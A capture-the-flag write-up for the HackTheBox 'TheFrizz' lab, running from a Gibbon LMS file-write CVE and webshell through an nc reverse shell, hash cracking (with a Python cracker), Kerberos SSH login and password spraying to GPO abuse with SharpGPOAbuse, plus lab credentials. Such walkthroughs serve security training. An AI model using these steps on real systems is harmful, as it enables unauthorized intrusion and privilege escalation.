
HTB write-up: TheFrizz

王妍芳 2025-6-7 16:17:16
Information gathering

nmap -sV -sC -O 10.10.11.60
  Nmap scan report for 10.10.11.60
  Host is up (0.63s latency).
  Not shown: 987 filtered tcp ports (no-response)
  PORT     STATE SERVICE       VERSION
  22/tcp   open  ssh           OpenSSH for_Windows_9.5 (protocol 2.0)
  53/tcp   open  domain        Simple DNS Plus
  80/tcp   open  http          Apache httpd 2.4.58 (OpenSSL/3.1.3 PHP/8.2.12)
  |_http-server-header: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
  |_http-title: Did not follow redirect to http://frizzdc.frizz.htb/home/
  88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-04-06 16:58:47Z)
  135/tcp  open  msrpc         Microsoft Windows RPC
  139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
  389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: frizz.htb0., Site: Default-First-Site-Name)
  445/tcp  open  microsoft-ds?
  464/tcp  open  kpasswd5?
  593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
  636/tcp  open  tcpwrapped
  3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: frizz.htb0., Site: Default-First-Site-Name)
  3269/tcp open  tcpwrapped
  Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
  Device type: general purpose
  Running (JUST GUESSING): Microsoft Windows 2022|2012|2016 (89%)
  OS CPE: cpe:/o:microsoft:windows_server_2022 cpe:/o:microsoft:windows_server_2012:r2 cpe:/o:microsoft:windows_server_2016
  Aggressive OS guesses: Microsoft Windows Server 2022 (89%), Microsoft Windows Server 2012 R2 (85%), Microsoft Windows Server 2016 (85%)
  No exact OS matches for host (test conditions non-ideal).
  Service Info: Hosts: localhost, FRIZZDC; OS: Windows; CPE: cpe:/o:microsoft:windows
  Host script results:
  | smb2-security-mode:
  |   3:1:1:
  |_    Message signing enabled and required
  |_clock-skew: 6h40m55s
  | smb2-time:
  |   date: 2025-04-06T16:59:55
  |_  start_date: N/A
  OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
  Nmap done: 1 IP address (1 host up) scanned in 170.30 seconds
CVE-2023-45878

The HTTP redirect gives us the host name frizzdc.frizz.htb (add it and frizz.htb to /etc/hosts). The web service is Gibbon LMS; a quick search turns up a CVE in its q parameter that can include local files, so first try reading the SQL file:
http://frizzdc.frizz.htb/Gibbon-LMS//?q=./gibbon.sql
That gets us nothing useful, so keep searching: CVE-2023-45878, an unauthenticated arbitrary file write in Gibbon, lets us drop a webshell.
[screenshot: 1.png]

Connect with AntSword, upload nc.exe and get a reverse shell back.
net user /domain
  a.perlstein
  Administrator
  c.ramon
  c.sandiego
  d.hudson
  f.frizzle
  g.frizzle
  Guest
  h.arm
  J.perlstein
  k.franklin
  krbtgt
  l.awesome
  m.ramon
  M.SchoolBus
  p.terese
  r.tennelli
  t.wright
  v.frizzle
  w.li
  w.Webservice
mysql

Read config.php to get the MySQL credentials:
  $databaseServer = 'localhost';
  $databaseUsername = 'MrGibbonsDB';
  $databasePassword = 'MisterGibbs!Parrot!?1';
  $databaseName = 'gibbon';
Use frp to forward port 3306 out, connect with Navicat and look at the gibbonperson table, which holds each user's password hash and salt:
067f746faca44f170c6cd9d7c4bdac6bc342c608687733f80ff784242b0b0c03$/aACFhikmNopqrRTVz2489
Crack it with john. Gibbon hashes as sha256(salt . password), so the hash$salt line above matches john's dynamic format:
john --format=dynamic='sha256($s.$p)' --wordlist=/usr/share/wordlists/rockyou.txt 1.hash
Password recovered: ***********
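As an added example (not code from the original post), here is the same check john performs for the sha256($s.$p) dynamic format, written in Python so the hash layout is explicit: the hash$salt line is split on the first $ (the hex digest never contains one), and each candidate is hashed with the salt prepended. The real password is redacted above, so the demo builds its own target from a made-up salt/password pair; the helper names are mine.

```python
import hashlib
from typing import Iterable, Optional, Tuple

# The real line from the post, in the layout john's dynamic format expects:
# hex(sha256(salt . password)) '$' salt
SAMPLE_LINE = "067f746faca44f170c6cd9d7c4bdac6bc342c608687733f80ff784242b0b0c03$/aACFhikmNopqrRTVz2489"


def gibbon_hash(password: str, salt: str) -> str:
    """Gibbon's scheme, same as john's sha256($s.$p): SHA-256 over salt followed by password.
    surrogateescape lets wordlist lines decoded the same way round-trip to their raw bytes."""
    data = (salt + password).encode("utf-8", errors="surrogateescape")
    return hashlib.sha256(data).hexdigest()


def make_hash_line(password: str, salt: str) -> str:
    """Produce a hash$salt line for a known password (handy for building test targets)."""
    return f"{gibbon_hash(password, salt)}${salt}"


def parse_hash_line(line: str) -> Tuple[str, str]:
    """Split hash$salt. The digest must be 64 hex chars; everything after the first '$' is the salt."""
    digest, sep, salt = line.rstrip("\r\n").partition("$")
    digest = digest.lower()
    if sep != "$" or len(digest) != 64 or any(c not in "0123456789abcdef" for c in digest):
        raise ValueError(f"not a sha256$salt line: {line!r}")
    return digest, salt


def crack(line: str, candidates: Iterable[str]) -> Optional[str]:
    """Return the first candidate whose salted SHA-256 equals the target digest, else None."""
    digest, salt = parse_hash_line(line)
    for cand in candidates:
        cand = cand.rstrip("\r\n")  # only strip the line ending; rockyou entries may end in spaces
        if gibbon_hash(cand, salt) == digest:
            return cand
    return None


def crack_with_wordlist(line: str, path: str) -> Optional[str]:
    """Stream a wordlist such as rockyou.txt; surrogateescape keeps its non-UTF-8 lines intact."""
    with open(path, encoding="utf-8", errors="surrogateescape") as fh:
        return crack(line, fh)


if __name__ == "__main__":
    print(parse_hash_line(SAMPLE_LINE))
    # Constructed demo: made-up salt and password, not the box's real credentials.
    demo_line = make_hash_line("Winter2024!", "saltyBus42")
    words = ["password", "frizz", "Winter2024!", "letmein"]
    print("demo:", crack(demo_line, words))  # Winter2024!
```

To run it against the real hash, put the line in a file and call crack_with_wordlist(SAMPLE_LINE, "/usr/share/wordlists/rockyou.txt"); it is pure Python, so expect it to be far slower than john on a full wordlist.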
Port 5985 is not open, so WinRM is out. Instead, get a Kerberos ticket for f.frizzle and log in over the OpenSSH service on port 22.
Kerberos authentication

Edit /etc/krb5.conf (the original had a typo, firzz, in admin_server; fixed here):
  [libdefaults]
          default_realm = FRIZZ.HTB
  # The following krb5.conf variables are only for MIT Kerberos.
          kdc_timesync = 1
          ccache_type = 4
          forwardable = true
          proxiable = true
          rdns = false
  # The following libdefaults parameters are only for Heimdal Kerberos.
          fcc-mit-ticketflags = true
  [realms]
      FRIZZ.HTB = {
          kdc = frizzdc.frizz.htb
          admin_server = frizzdc.frizz.htb
          default_domain = frizz.htb
      }
  [domain_realm]
      .frizz.htb = FRIZZ.HTB
      frizz.htb = FRIZZ.HTB
Request a TGT with kinit f.frizzle@FRIZZ.HTB (enter the cracked password). Note the clock-skew: 6h40m55s that nmap reported: the KDC rejects requests whose timestamp is more than five minutes off, so sync your clock to the DC first (e.g. sudo ntpdate frizzdc.frizz.htb) or kinit will fail.
Check the ticket with klist.
[screenshot: 2.png]

Log in with the ticket: ssh -K f.frizzle@frizz.htb (-K turns on GSSAPI authentication and credential delegation; the host name you connect to has to resolve and match the DC's SPN, so add it to /etc/hosts if needed). Then read Desktop/user.txt.
BloodHound

It kept timing out, dammit, so I had to upload SharpHound.exe and collect on the box itself, which hung for what felt like forever; in the end I shipped the zip back to Kali with nc.
Looked through f.frizzle's domain relationships: nothing. Useless user. Digging through the Recycle Bin turned up an archive.
[screenshot: 3.png]

Transferred it with nc (waited forever), unzipped it and went looking for passwords.
grep -IR "wapt_password". Why search for that? Because that is what the file is called; grepping for just "password" returns far too much.
Password found: !suBcig@MehTed!R
Spray it with kerbrute: kerbrute passwordspray -d frizz.htb --dc 10.10.11.60 user.txt '!suBcig@MehTed!R'
[screenshot: 4.png]

It belongs to M.SchoolBus; SSH in as that user.
[screenshot: 5.png]

This lab is awful, so I'll just describe the approach: look at M.SchoolBus's relationships in BloodHound.
[screenshot: 6.png]

M.SchoolBus is a member of Group Policy Creator Owners (GPCO), so the route is GPO abuse: create a malicious GPO, link it to the Domain Controllers OU and use it to grant ourselves admin rights. Group membership alone only lets you create GPOs; linking one to an OU also needs write access to that OU's gPLink attribute, so confirm that edge in BloodHound before relying on it.
  # Create the malicious GPO
  New-GPO -Name "hacker"
  # Link it to the Domain Controllers OU
  New-GPLink -Name "hacker" -Target "OU=Domain Controllers,DC=frizz,DC=htb"
  # Add M.SchoolBus to the local Administrators group on every machine the GPO applies to
  # (on a DC that is the domain's BUILTIN\Administrators group, not Domain Admins)
  .\SharpGPOAbuse.exe --AddLocalAdmin --UserAccount M.SchoolBus --GPOName hacker
  # Force the policy to apply; we are already on the DC, so this applies it locally
  gpupdate /force
Group membership is only evaluated at logon, so open a new SSH session afterwards to get a token with the new group, then read root.txt. When finished, unlink and delete the GPO (Remove-GPLink, Remove-GPO) so the change does not persist.
Done.
